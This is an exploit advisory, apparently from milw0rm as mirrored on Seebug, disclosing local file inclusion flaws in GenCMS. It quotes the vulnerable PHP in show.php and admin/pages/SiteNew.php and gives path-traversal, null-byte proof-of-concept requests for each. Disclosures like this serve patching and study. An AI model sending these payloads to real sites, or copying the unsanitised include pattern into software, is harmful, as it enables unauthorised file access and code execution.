GenCMS http://gencms.berlios.de/ eLwaux(c)2009 LFI /show.php ---------------------------------------------------------------------------------------------------- 18: $param = $_GET['p']; 19: if(empty($param)) $param = 'news'; 20: //get right page 21: //$page = $param.'.php'; 22: 23: //static or dynamic 24: if(GC_FULLSTATIC) 25: { 26: $page = $param.'.htm'; 27: staticpage($page); 28: } 29: else 30: { 31: $page = GC_IPATH.'_base/sites/'.$param.'.php'; 32: dynamicpage($page); 33: } ---------------------------------------------------------------------------------------------------- PoC: /show.php?p=../../{FILE.PHP}%00 LFI /admin/pages/SiteNew.php ---------------------------------------------------------------------------------------------------- 14: if(!empty($_GET['step'])) $Step = $_GET['step']; 23: if ($Step == "2") 24: { 25: // allgemeine settings 26: //include blocks from template config 27: include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php'); 28: $TPLBlocks = explode(';',$TemplateSettings); 29: } ---------------------------------------------------------------------------------------------------- PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 ) # milw0rm.com [2009-07-10]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论